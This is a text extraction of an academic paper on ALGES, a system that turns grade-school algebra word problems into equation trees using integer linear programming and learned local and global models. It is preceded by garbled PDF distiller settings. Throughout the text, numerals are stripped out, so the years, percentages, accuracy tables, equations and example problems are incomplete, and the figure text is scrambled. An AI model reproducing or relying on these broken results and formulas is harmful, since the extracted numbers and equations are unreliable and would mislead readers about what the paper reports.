f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice parsing algebraic word problems into equations rik koncel-kedziorski, hannaneh hajishirzi, ashish sabharwal†, oren etzioni†, and siena dumas ang university of washington, †allen institute for ai {kedzior,hannaneh,sienaang}@uw.edu, {ashishs,orene}@allenai.org abstract this paper formalizes the problem of solv- ing multi-sentence algebraic word problems as that of generating and scoring equation trees. we use integer linear programming to gener- ate equation trees and score their likelihood by learning local and global discriminative mod- els. these models are trained on a small set of word problems and their answers, without any manual annotation, in order to choose the equation that best matches the problem text. we refer to the overall system as alges. we compare alges with previous work and show that it covers the full gamut of arithmetic operations whereas hosseini et al. ( ) only handle addition and subtraction. in addition, alges overcomes the brittleness of the kush- man et al. ( ) approach on single-equation problems, yielding a % to % reduction in error. introduction grade-school algebra word problems are brief nar- ratives (see figure ). a typical problem first de- scribes a partial world state consisting of characters, entities, and quantities. next it updates the condition of an entity or explicates the relationship between entities. finally, it poses a question about a quantity in the narrative. an ordinary child has to learn the required alge- bra, but will easily grasp the narrative utilizing ex- tensive world knowledge, large vocabulary, word- sense disambiguation, coreference resolution, mas- tery of syntax, and the ability to combine individual oceanside bike rental shop charges dollars plus dollars an hour for renting a bike. tom paid dollars to rent a bike. how many hours did he pay to have the bike checked out? = +$ $ ∗$ $ xh $ solution : + ( ∗x) = figure : example problem and solution sentences into a coherent mental model. in contrast, the challenge for an nlp system is to “make sense” of the narrative, which may refer to arbitrary activ- ities like renting bikes, collecting coins, or eating cookies. previous work coped with the open-domain as- pect of algebraic word problems by relying on deter- ministic state transitions based on verb categoriza- tion (hosseini et al., ) or by learning templates that cover equations of particular forms (kushman et al., ). we have discovered, however, that both approaches are brittle, particularly as training data is scarce in this domain, and the space of equations grows exponentially with the number of quantities mentioned in the math problem. we introduce alges, which maps an unseen multi-sentence algebraic word problem into a set of possible equation trees. figure shows an equation tree alongside the word problem it represents. alges generates the space of trees via integer linear programming (ilp), which allows it to con- the code and data is publicly available at https://gitlab.cs.washington.edu/alges/tacl . strain the space of trees to represent type-consistent algebraic equations satisfying as many desirable properties as possible. alges learns to map spans of text to arithmetic operators, to combine them given the global context of the problem, and to choose the “best” tree corresponding to the problem. the training set for alges consists of unannotated algebraic word problems and their solution. solv- ing the equation represented by such a tree is trivial. alges is described in detail in section . alges is able to solve word problems with single-variable equations like the ones in figure . in contrast to hosseini et al. ( ), alges covers +,−,∗, and /. the work of kushman et al. ( ) has broader scope but we show that it relies heav- ily on overlap between training and test data. when that overlap is reduced, alges is % to % more accurate than this system. our contributions are as follows: ( ) we formal- ize the problem of solving multi-sentence algebraic word problems as that of generating and ranking equation trees; ( ) we show how to score the like- lihood of equation trees by learning discriminative models trained from a small number of word prob- lems and their solutions – without any manual an- notation; and ( ) we demonstrate empirically that alges has broader scope than the system of hos- seini et al. ( ), and overcomes the brittleness of the method of kushman et al. ( ). previous work our work is related to situated semantic interpre- tation, which aims to map natural language sen- tences to formal meaning representations (zelle and mooney, ; zettlemoyer and collins, ; ge and mooney, ; kwiatkowski et al., ). more closely related is work on language grounding, whose goal is the interpretation of a sentence in the context of a world representation (branavan et al., ; liang et al., ; chen et al., ; bordes et al., ; feng and lapata, ; hajishirzi et al., ; matuszek et al., ; hajishirzi et al., ; artzi and zettlemoyer, ; koncel-kedziorski et al., ; yatskar et al., ; seo et al., ; hixon et al., ). however, while most previ- ous work considered individual sentences in isola- tion, solving word problems often requires reason- ing across the multi-sentence discourse of the prob- lem text. recent efforts in the math domain have studied number word problems (shi et al., ), logic puzzle problems (mitra and baral, ), arithmetic word problems (hosseini et al., ; roy et al., a), algebra word problems (kush- man et al., ; zhou et al., ), and geometry word problems (seo et al., ). roy et al. ( b) introduce a system for reason- ing about quantities, which they extend to arithmetic word problems that can be solved by choosing only two values from the text and applying an arithmetic operator. by comparison, our method learns to solve complex problems with many operands where the space of possible solutions is larger. hosseini et al. ( ) solve elementary addition and subtraction problems by learning verb cate- gories. they ground the problem text to a seman- tics of entities and containers, and decide if quanti- ties are increasing or decreasing in a container based upon the learned verb categories. while relying only on verb categories works well for +,−, model- ing ∗,/ requires going beyond verbs. for instance, “tina has cats. john has more cats than tina. how many cats do they have together?” and “tina has cats. john has times as many cats as tina. how many cats do they have together?” have identi- cal verbs, but the indicated operation (+ and * resp.) is different. alges makes use of a richer seman- tic representation which facilitates deeper learning and a wider scope of application, solving problems involving the +,−,/, and ∗ operators (see table ). kushman et al. ( ) introduce a general method for solving algebra problems. this work can align a word problem to a system of equations with one or two unknowns. they learn a mapping from word problems to equation templates using global and lo- cal features from the problem text. however, the large space of equation templates makes it challeng- ing for this model to learn to find the best equation directly, as a sufficiently similar template may not have been observed during training. instead, our method maps word problems to equation trees, tak- ing advantage of a richer representation of quanti- fied nouns and their properties, as well as the recur- sive nature of equation trees. these allow alges to use a bottom-up approach to learn the correspon- dence between spans of texts and arithmetic oper- ators (corresponding to intermediate nodes in the tree). alges then scores equations using global structure of the problem to produce the final result. our work is also related to research in using ilp to enforce global constraints in nlp appli- cations (roth and yih, ). most previous work (srikumar and roth, ; goldwasser and roth, ; berant et al., ; liu et al., ) uti- lizes ilp as an inference procedure to find the best global prediction over initially trained local classi- fiers. similarly, we use ilp to enforce global and domain specific constraints. we, however, use ilp to form candidate equations which are then used to generate training data for our classifiers. our work is also related to parser re-ranking (collins, ; ge and mooney, ), where a re-ranker model at- tempts to improve the output of an existing proba- bilistic parser. similarly, the global equation model designed in alges attempts to re-rank equations based on global problem structure. setup and problem definition given numeric quantities v and an unknown x whose value is the answer we seek, an equation over v and x is any valid mathematical expression formed by combining elements of v ∪{x} using bi- nary operators from o = {+,−,∗,/,=} such that x appears exactly once. when each element of v appears at most once in the equation, it may natu- rally be represented as an equation tree where each operator is a node with edges to its two operands. t denotes the set of all equation trees over v and x. problem formulation. we address the problem of solving grade-school algebra word problems that map to single equations. solving such a word prob- lem w amounts to selecting an equation tree t repre- senting the mathematical computation implicit in w. figure shows an example of w with quantities un- derlined, and the corresponding tree t. formally, we use a joint probability distribution p(t,w) that de- fines how “well” an equation tree t ∈ t captures the mathematical computation expressed in w. given a word problem w as input, our goal is to compute t̃ = arg maxt∈t p(t|w). problems involving simultaneous equations require com- bining multiple equation trees, one per equation. −( *x)= = ( *x)+ = (x* )+   .  train  local  model  (sec(on   . )   on  monday,    students  went  on  a  trip  to  the  zoo.  all    buses  were  filled   and    students  had  to  travel  in  cars.    how  many  students  were  in  each  bus  ?   qnt: ent: student qnt: ent: bus qnt: ent: student qnt: x ent: student ctr: bus .  ground  text  w  into  base  qsets  (sec(on   )   :  subset  of  t(w)  yielding  correct  solu(on   s   *s   -s   s   b   xs   =   s   =   +s   *s   s   b   xs   s   +s   -s   s   =   b   xs   ( b,xs) ( s,combine( b,xs)) ( b,xs) (combine( b,xs), s) .  use  ilp  to  generate  m  equa(on  trees  t(w)  (sec(on   )         .  train  global  model  (sec(on   . )                                        :  problem-­‐tree  pairs   +( *x)= = ( / x)+ −(x+ )= trlocal trglobal tl(w) :  operator  nodes  in  tl(w) t(w) \tl(w) training  example   label   * − * + posi>ve  examples   (from                            )   nega>ve  examples   (from                                                      )  tl(w) t(w) \tl(w) figure : an overview of the process of learning for a word problem and its qsets. an exhaustive enumeration over t quickly be- comes impractical as problem complexity increases and n = |v ∪ {x}| grows. specifically, |t| > h(n) = n! (n− )! (n− ) n− , h( ) = ,h( ) > . m,h( ) > b, etc. this vast search space makes it challenging for a discriminative model to learn to find t̃ directly, as a sufficiently similar tree may not have been observed during training. in- stead, our method first generates syntactically valid equation trees, and then uses a bottom-up approach to score equations with a local model trained to map spans of text to math operators, and a global model trained for coherence of the entire equation w.r.t. global problem text structure. overview of the approach figure gives an overview of our method, also detailed in figure . in order to build equation trees, we use a compact representation for each node called a quantified set or qset to model natural lan- guage text quantities and their properties (e.g., ‘ students’ in ‘ buses’). qsets are used for tracking and combining quantities when learning the corre- spondence between equation trees and text. definition . given a math word problem w, let s learning (word problems w , corresponding solutions l): . for every problem-solution pair (wi,`i) with wi ∈ w,`i ∈ l (a) s ← base qsets obtained by grounding text wi and reordering the resulting qsets (section ) (b) ti ← top m type-consistent equation tree candidates generated by ilp(wi) (section ) (c) t`i ← subset of ti that yields the correct numerical solution `i (d) add to trlocal features 〈s ,s 〉 with label op for each operator op combining qsets s ,s in trees in t`i (e) add to trglobal features 〈w,t〉 labeled positive for each t ∈ t`i and labeled negative for each t ∈ t \t`i . llocal ← train a local qset relationship model on trlocal (section . ) . gglobal ← train a global equation model on trglobal (section . ) . output local and global models (llocal,gglobal) inference (word problem w, local set relation model llocal , global equation model gglobal ): . s ← base qsets obtained by grounding text wi and reordering the resulting qsets (section ) . t ← top m type-consistent equation tree candidates generated by ilp(w) (section ) . t∗ ← arg maxti∈t (∏ tj∈t llocal(tj|w) ) ×gglobal(t|w), scoring each tree ti ∈ t based on equation . ` ← numeric solution to w obtained by solving equation tree t∗ for the unknown . output (t∗,`) figure : overview of our method for solving algebraic word problems. be the set of all possible spans of text in w, φ denote the empty span, and sφ = s∪{φ}. a qset for w is either a base qset or a compound qset. a base qset is a tuple (ent,qnt,adj, loc,vrb,syn,ctr) with: • ent ∈ s: entity or quantity noun (e.g., ‘student’); • qnt ∈ r∪{x}: number or quantity (e.g., or x); • adj ⊆ sφ: adjectives for ent in w; • loc ∈ sφ: location of ent (e.g., ‘in the drawer’); • vrb ∈ sφ: governing verb for ent (e.g., ‘fill’); • syn: syntactic and positional information for ent (e.g., ‘buses’ is in subject position) ; • ctr ⊆ sφ: containers of ent (e.g., ‘bus’ is a con- tainer for the ‘students’ qset). properties being φ indicates these optional proper- ties are unspecified. a compound qset is formed by combining two qsets with a non-equality binary op- erator as discussed in section . qsets can be further combined with the equality operator to yield a semantically augmented equation tree. the example in figure has four base qsets extracted from problem text. each possible equation tree corresponds to a different recursive combination of these four qsets. given w, alges first extracts a list of n base qsets s = {s , . . . ,sn} (section ). it then uses an ilp-based optimization method to combine ex- tracted qsets into a list of type-consistent candidate inspired by semantically augmented parse trees (ge and mooney, ) adapted to equational logic. equation trees (section ). finally, alges uses dis- criminative models to score each candidate equation, using both local and global features (section ). specifically, the recursive nature of our represen- tation allows us to decompose the likelihood func- tion p(t,w) into local scoring functions for each in- ternal node of t followed by scoring the root node: p(t|w) ∝  ∏ tj∈t llocal(tj|w)  ×gglobal(t|w) ( ) where the local function llocal(tj|w) scores the like- lihood of the subtree tj, modeling pairwise qset re- lationships, while the global function gglobal(t|w) scores the likelihood of the root of t, modeling the equation in its entirety. learning. alges learns in a weakly supervised fashion, using word problems wi and only their cor- rect answer `i (not the corresponding equation tree) as training data {(wi,`i)}i∈{ ,...,n}. we ground each wi into ordered qsets and generate a list of type-consistent candidate training equations t`i that yield the correct answer `i. we build a local discriminative model llocal to score the likelihood that a math operator op ∈ o can correctly combine two qsets s and s based on their semantics and intertextual relationships. for example, in figure this model learns that ∗ has a high likelihood score for ‘ buses’ and ‘x students’. the training data consists of feature vectors 〈s ,s 〉 labeled with op, derived from the equation trees that yield the correct solution. we also build a global discriminative model that scores equation trees based on the global problem structure: gglobal = ψᵀfglobal(w,t) where fglobal represents global features of w and t, and φ are pa- rameters to be learned. the training data consists of feature vectors 〈w,t〉 for equation trees that yield the correct solution as positive examples, and the rest as negatives (figure ). the details of learning and in- ference steps are described in section . grounding and combining qsets we discuss how word problem text is grounded into an ordered list of qsets. a qset is a compact rep- resentation of the properties of a quantity as de- scribed in a single sentence. the use of qsets facil- itates the building of semantically augmented equa- tion trees. additionally, by tracking certain proper- ties of text quantities, alges can resolve pronomi- nal references or elided nouns to properties of previ- ous qsets. it can also combine information about quantities referenced in different sentences into a single semantic structure for further use. grounding. alges translates the text of the prob- lem w into interrelated base qsets {s , . . . ,sn}, each associated with a quantity in the problem text w. the properties of each qset (definition ) are ex- tracted from the dependency parse relations present in the sentence where the quantity is referred to ac- cording to the rules described in table . additionally, alges assigns a single target qset sx corresponding to the question sentence. the properties of the target qset are also extracted ac- cording to the rules of the table . in particular, the qnt property is set to unknown, the ent is set to the noun appearing after the words what, many or much in the target sentence, and the other properties are extracted as listed in table . reordering. in order to reduce the space of possible equation trees, alges reorders qsets {s , . . . ,sn} according to semantic and textual information and enforces a constraint that qsets can only combine with adjacent qsets in the equation tree. in fig- ure , the target qset corresponding to the unknown (x ‘students’) is moved from its textual location at for each quantity mentioned in the text, properties (qnt,ent,ctr,adj,vrb, loc) of the corresponding qset are extracted as follows: . qnt (quantity) is a numerical value or determiner found in the problem text, or a variable. . ent (entity) is a noun related to the qnt in the depen- dency parse tree. if qnt is a numerical value, ent is the noun related by the num, number, or prep of rela- tions. if qnt is a determiner, ent is the noun related via the det relation. when such a noun does not exist due to parse failure or pragmatic recoverability, ent is the noun that is closest to qnt in the same sentence or the ent associated with the most recent qset. . ctr (container) is the subject of the verb govern- ing ent, except in two cases: when this subject is a pronominal reference, the ctr is set to the ctr of the closest previous qset; if ent is related to another qset whose qnt is one of each, every, a, an, per, or one, ctr is set to the ent of that qset. . adj (adjectives) is a list of adjectives related to ent by the amod relation. . vrb (verb) is a governing verb, either related to ent by nsubj or dobj . loc (location) is a noun related to ent by prep on, prep in, or prep at relations. table : the process of forming a single qset. the end of the problem and placed adjacent to the qset with entity ‘buses’. this move is triggered by the relationship between the target entity ‘student’ and its container ‘bus’ that is quantified by each in the last sentence. in addition to the container match rule, we employ three other rules to move the target qset as described in table . combining. two qsets and an arithmetic operator can be combined via the combine function to form a third qset, alternately referred to as a compound. because of this, we can represent intermediate nodes in the equation tree as qsets themselves. the recur- sive combination of qsets allows us to effectively decompose equation trees into a collection of local operations over identical abstractions. this enables learning features of qsets and text that indicate par- ticular operations from both leaf and intermediate nodes. the mechanics of c ← combine(a,b,op) are detailed below. these reordering rules are intentionally minimal, but do provide some gain over both preserving the text ordering of quantities or setting ordering as a soft constraint. see table . . move qset si to immediately after qset sj if the con- tainer of si is the entity of sj and is quantified by each. . move target qset to the front of the list if the ques- tion statement includes keywords start or begin. . move target qset to the end of the list if the question statement includes keywords left, remain, and finish. . move target qset to the textual location of an inter- mediate reference with the same ent if its num prop- erty is the determiner some. table : rules for reordering qsets. for op = +, the properties of either qset a or b suffice to define c. alges always forms c using the properties of b in these situations. for op = −, the properties of the left operand a define the resul- tant set, as evidenced by the subtraction operations present in the first problem in table . to determine the stickers in luke’s possession, we need to track stickers related to the left qset with the verb ‘got’. for op = ∗, the qset relationship is captured by the container and entity properties: the one whose properties preserve after multiplication has the other’s entity as its container. in figure , the ‘bus’ qset is the container of ‘students’. when these are combined with the ∗ operator, the result is of en- tity type ‘student’. for op = /, we use the prop- erties of the left operand to encourage a distinction between division and multiplication. generating equation trees with ilp we use an ilp optimization model to generate equa- tion trees involving n base qsets. these equation trees are used for both learning and inference steps. alges generates an ordered list of m of the most desirable candidate equations for a given word prob- lem w using an ilp, which models global consider- ations such as type consistency and appropriate low expression complexity. to facilitate generation of equation trees, we represent them in parenthesis-free postfix or reverse polish notation, where a binary op- erator immediately follows the two operands it op- erates on (e.g., abc+∗x=). given a word problem w with n base qsets (cf. table for notation), we build an optimization model ilp(w) over the space of postfix equations e = e e . . .el of length l involving k numeric constants, k′ = n − k unknowns, r possible binary operators, and q “types” of qsets, where type cor- responds to the entity property of qsets and deter- mines which binary relationships are permitted be- tween two given qsets. for single variable equations over binary operators o, k′ = ,r = |o| = , and l = n− . for brevity, define m = n + r and let [j] denote { , . . . ,j}. expression e can be evalu- ated by considering e ,e , . . . ,el in order, pushing non-operator symbols on to a stack σ, and, for op- erator symbols, popping the top two elements of σ, applying the operator to them, and pushing the result back on to σ. the stack depth of the ei is the stack size after ei has been processed this way. input w input math word problem n number of base qsets k number of numeric constants k′ number of unknowns ( for single-var. eqns.) r number of binary operators (r = |o| = ) m number of possible symbols (n + r) typej type of j-th base qset m desired number of candidate equation trees l desired length of postfix equations ( n− ) output e postfix equation to be generated ei i-th element of e; i ∈ [l] variables for i ∈ [l] xi main ilp variable for i-th symbol of e ci indicator variable: ei is a numeric constant ui indicator variable: ei is an unknown oi indicator variable: ei is an operator di postfix stack depth of ei; di ∈ [l] ti type of ei (corresponds to qset entity); ti ∈ [q] table : ilp notation for candidate equations model variables. integer variables x ,x , . . . ,xl encode which symbol each ei refers to. their domain, [m], represents the k numeric constants in the same order as their respective qsets, followed by the k′ unknowns, and finally operators in the order +,−,∗,/,=. binary variables ci,ui, and oi indicate whether ei is a numeric constant, unknown, or oper- ator, resp. variables di with domain [l] equal the postfix stack depth of ei. finally, variables ti with domain [q] indicate the type of ei. for j ∈ [n] , i.e., for the k constants and k′ unknowns, typej ∈ [q] denotes the respective qset entity. uncertainty in object types may be incorporated easily by treating typej as a (potentially weighted) subset of [q]. constraints and objective function. constraints in ilp(w) include syntactic validity, type consis- tency, and domain specific simplicity considera- tions. we describe them briefly here, leaving details to the appendix. the objective function minimizes the sum of the weights of violated soft constraints. below, (h) denotes hard constraints, (w) weighted soft constraints, and (p) post-processing steps. definitional constraints (h): constraints over in- dicator variables ci,ui, and oi ensure they repre- sent their intended meaning, including the invariant ci + ui + oi = . for stack depth variables, we add d = and di = di− − oi + for i > . syntactic validity (h): validity of the postfix ex- pression is enforced easily through constraints o = and dl = . in addition, we add xl = m and xi < m for i < l to ensure equality occurs exactly once and as the top-level operator. operand access (h): the second operand of an operator symbol ei is always ei− . its first operand, however, is defined instead by the stack-based eval- uation process. ilp(w) encodes it using an alterna- tive characterization: the first operand of ei is ej iff j ≤ i− and j is the largest index such that di = dj. type consistency (w): suppose t and t are the types of the two operands of an operator o, whose type is to. addition and subtraction preserve the type of their operands, i.e., if o is + or −, then to = t = t . multiplication inherits the type of one of its operands, and division inherits the type of its first operand. in both cases, the two operands must be of different types. formally, if o is ∗, then to ∈ {t ,t } and t = t ; if o is /, then to = t = t . domain considerations (h,w): we add a few do- main specific constraints based on patterns observed in a small subset of the questions. these include an upper bound on the stack depth, which helps avoid overly complex expressions unsuitable for grade- school algebra, and reducing redundancy by, e.g., disallowing the numeric constant to be an operand of + or − or the second operand of /. symmetry breaking (h,w): if a commutative op- erator is preceded by two numeric constants (e.g., ab+), we require the constants to respect their qset ordering. every other pair of constants that disre- spects its qset ordering incurs a small penalty. negative and fractional answers (p): rather than imposing non-negativity as a complex constraint in ilp(w), we filter out candidate expressions yielding a negative answer as a post-processing step. sim- ilarly, when all numeric constants are integers, we filter out expressions yielding a fractional answer, again based on typical questions in our datasets. learning our goal is to learn a scoring function that identifies the best equation tree t∗ corresponding to an unseen word problem w. since our dataset consists only of problem-solution pairs {(wi,`i)}i= ,...,n , train- ing our scoring models requires producing equa- tion trees matching `i. for every training in- stance (wi,`i), we use ilp(wi) to generate m type- consistent equation tree candidates ti. to train our local model (section . ), we filter out trees from ti that do not evaluate to `i, extract all (s ,s ,op) triples from the remaining trees, and use feature vec- tors capturing (s ,s ) and labeled with op as train- ing data (see figure ). for the global model, we use for training data a subset of ti with an equal number of correct and incorrect equation trees (section . ). once trained, we use equation to combine these models to compute a score for each candidate equa- tion tree generated for an unseen word problem at inference time (see figure ). . local qset relationship model we train a local model of a probability distribu- tion over the math operators that may be used to combine a pair of qsets. the idea is to learn the correspondence between spans of texts and math op- erators by examining such texts and the qsets of the involved operands. given qsets s and s , the lo- cal scoring function scores the probability of each op ∈ {+,−,∗,/}, i.e., llocal = θᵀflocal(s ,s ) where flocal is a feature vector for s and s . note that either qset may be a compound (the result of a combine procedure). the goal is to learn parameters θ by maximizing the likelihood of the operators be- tween every two qsets that we observe in the train- ing data. we model this as a multi-class svm with an rbf kernel. features. given the richness of the textual possi- bilities for indicating a math operation, the features are designed over semantic and intertextual relation- ships between qsets, as well as domain-specific lex- . single qset features (repeated for b) • what argument of its governing verb is a? • is a a subset of another set? • is a a compound? • math keywords found in context of a • verb lin distance from known verb categories (b only) . relational features between qsets a and b • entity match • adjective overlap • location match • distance in text • lin similarity between verbs governing a and b • is one a subtype of the other? • does one contain the other? . target quantity features • a/b is target qset • a/b entity matches target entity • math keywords in target context . root node features • # of ilp constraints violated by equation • scores of left and right subtrees of root figure : features used for local and global models, for left qset a and right qset b ical features. the feature vector includes three main feature categories (table ). first, single set features include syntactic and po- sitional features of individual qsets. for example, they include indicator features for whether elements of a short lexicon of math-specific terms such as ‘add’ and ‘times’ appear in the vicinity of the set reference in the text. also, following hosseini et al. ( ), we include a vector that captures the dis- tance between the verbs associated with each qset and a small collection of verbs found to be useful in categorizing arithmetic operations in that work, based upon their lin similarity (lin, ). second, relationships between qsets are de- scribed w.r.t. various qset properties described in section . these include binary features like whether one qset’s container property matches the other qset’s entity (a strong indicator of multiplication), or the distance between the verbs associated with each set based upon their lin similarity. third, target quantity features check the matching between the target qset and the current qset as well as math keywords in the target sentence. . global equation model we also train a global model that scores equation trees based on the global structure of the tree and the problem text. the global model scores the com- patibility of the tree with the soft constraints intro- duced in section as well as its correspondence with the problem text. we use a discriminative model: gglobal = ψᵀfglobal(w,t) where fglobal are the fea- tures capturing trees and their correspondences with the problem text. we train a global classifier to relate these features through parameters ψ. features fglobal are explained in table . they include the number of violated soft constraints in the ilp, the probabilities of the left and right subtrees of the root as provided by the local model, and global lexical features. additionally, the three local feature sets are applied to the left and right qsets. . inference for an unseen problem w, we first extract base qsets from w. the goal is to find the most likely equation tree with minimum violation of hard and soft con- straints. using ilp(w) over these qsets, we gener- ate m candidate equation trees ordered by the sum of the weights of the constraints they violate. we compute the likelihood score given by eqn. ( ) for each candidate equation tree t, use this as an esti- mate of the likelihood p(t|w), and return the can- didate tree t∗ with the highest score. in eqn. ( ), the score of t is the product of the likelihood scores given by the local classifier for each operand in t and the qsets over which it operates, multiplied by the likelihood score given by the global classifier for the correctness of t. if the resulting equation provides the correct answer for w, we consider inference suc- cessful. experiments this section reports on three experiments: a com- parison of alges with kushman et al. ( )’s template-based method, a comparison of alges with hosseini et al. ( )’s verb-categorization methods, and ablation studies. the experiments are complicated by the fact that alges is limited to sin- gle equations, and the verb categorization method can only handle single-equations without multipli- cation or division. our main experimental result is to show an improvement over the template-based method on single-equation algebra word problems. we further show that the template-based method de- pends on lexical and template overlap between its training and test sets. when these overlaps are re- duced, the method’s accuracy drops sharply. in con- trast, alges is quite robust to changes in lexical and template overlap (see tables and ). experimental setup. we use the stanford de- pendency parser in corenlp . (de marneffe et al., ) to obtain syntactic information used for grounding and feature computation. for the ilp model, we use cplex . . (ibm ilog, ) to generate the top m = equation trees with a maximum stack depth of , aborting exploration upon hitting k feasible solutions or seconds. we use python’s sympy package for solving equa- tions for the unknown. for the local and global mod- els, we use the libsvm package to train svm clas- sifiers (chang and lin, ) with rbf kernels that return likelihood estimates as the score. dataset. this work deals with grade-school alge- bra word problems that map to single equations with varying length. every equation may involve mul- tiple math operations including multiplication, di- vision, subtraction, and addition over non-negative rational numbers and one variable. the data is gathered from math-aids.com, k learning. com, and ixl.com websites and a subset of the data from kushman et al. ( ) that maps word problems to single equations. we refer to this dataset as singleeq (see table for example problems). the singleeq dataset consists of problems, , sentences, and , words. baselines. we compare our method with the template-based method (kushman et al., ) and the verb-categorization method (hosseini et al., ). for the template-based method, we use the fully supervised setting, providing equations for each training example. . comparison with template-based method we first compare alges with the template-based method over singleeq. we evaluate both systems these hyper-parameters were chosen based on experimen- tation with a small subset of the questions. a more systematic choice may improve overall performance. template overlap . . . . alges . . . . template-based . . . . error reduction % % % % table : decreasing template overlap: accuracy of alges versus the template-based method on single- equation algebra word problems. the first column corre- sponds to the singleeq dataset, and the other columns are for subsets with decreasing template overlap. lexical overlap . . . . alges . . . . template-based . . . . error reduction % % % % table : decreasing lexical overlap: accuracy of alges versus the template-based method on single-equation al- gebra word problems. the first column corresponds to the singleeq dataset, and the other columns are for sub- sets with decreasing lexical overlap. on the number of correct answers provided and re- port the average of a -fold cross validation. alges achieves % accuracy whereas the template-based method achieves % accuracy, a % relative re- duction in errors (first columns in tables and ). this result is statistically significant with a p-value of . under a paired t-test. lexical overlap. by further analyzing singleeq, we noted that there is substantial overlap between the content words (common noun, adjective, adverb, and verb lemmas) in different problems. for ex- ample, many problems ask for the total number of seashells collected by two people on a beach, with only the names of the people and the number of seashells that each found changed. to analyze the effect of this repetition on the learning methods eval- uated, we define a lexical overlap parameter as the total number of content words in a dataset divided by the number of unique content words. the two “seashell problems” have a high lexical overlap. template overlap. we also noted that many prob- lems in singleeq can be solved using the same template, or equation tree structure above the leaf nodes. for example, a problem which corresponds to the equation ( ∗ ) + and a different problem that maps to ( ∗ ) + share the same template. we introduce a template overlap parameter defined as the average number of problems with the same template in a dataset. results. in our data, template overlap and lexi- cal overlap co-vary. to demonstrate the brittleness of the template-based method simply, we picked three subsets of singleeq where both parame- ters were substantially lower than in singleeq and recorded the relative performance of the template- based method and of alges in tables and . the data used in both tables is the same, but the ta- bles are separated for readability. the first column reports results for the singleeq dataset, and the other columns report results for the subsets with de- creasing template and lexical overlaps. the subsets consist of , , and questions respectively. we see that as the lexical overlap drops from . to . and as the template overlap drops from . to . , the relative advantage of alges over the tem- plate methods goes up from % to %. while the template-based method is able to solve a wider range of problems than alges, its accu- racy falls off significantly when faced with fewer re- peated templates or less spurious lexical overlap be- tween problems (from . to . ). the accuracy of alges also declines from . to . across the table, which needs to be investigated further. in future work, we also need to investigate additional settings for the two parameters and to attempt to “break” their co-variance. nevertheless, we have uncovered an important brittleness in the template- based method and have shown that alges is sub- stantially more robust. . comparison with verb-categorization the verb-categorization method learns to solve ad- dition and subtraction problems, while alges is ca- pable of solving multiplication and division prob- lems as well. we compare against their method over our dataset as well as the dataset provided by that work, here referred to as addsub. addsub consists of addition and subtraction word problems with the possibility of irrelevant distractor quanti- ties in the problem text. the verb categorization method uses rules for handling irrelevant informa- tion. an example rule is to remove a qset whose ad- jective is not consistent with the adjective of the tar- get qset. we augment alges with rules introduced in this method for handling irrelevant information in addsub. results, reported in table , show comparable accuracy between both methods on hosseini et al. ( ) data. our method shows a significant im- provement versus theirs on the singleeq dataset due to the presence of multiplication and division operators, as % of the problems in our dataset in- clude these operators. method addsub singleeq alges . . verb-categorization . . error reduction - % table : accuracy of alges compared to verb catego- rization method. . ablation study in order to determine the effect of various compo- nents of our system on its overall performance, we perform the following ablations: no local model: here, we test our method absent the local information (section . ). that is, we gen- erate equations using all ilp constraints, and score trees solely on information provided by the global model: p(t|w) ∝gglobal(w,t). no global model: here, we test our method with- out the global information (section . ). that is, we generate equations using only the hard constraints of ilp and score trees solely on information provided by the local model: p(t|w) ∝ ∏ ti∈tllocal(w,ti). no qset reordering: we test our method without the deterministic qset reordering rules outlined in section . instead, we allow the ilp to choose the top m equations regardless of order. results in table show that each component of alges contributes to its overall performance on the singleeq corpus. we find that both the global and local models contribute significantly to the overall system, demonstrating the significance of a bottom- up approach to building equation trees. importance of features. we also evaluate the ac- curacy of the local qset relationship model (sec- method accuracy alges . no local model . no global model . no qset reordering . table : ablation study of each component of alges. method accuracy local classifier: full feature set . no single set features . no set relation features . no target features . table : accuracy of 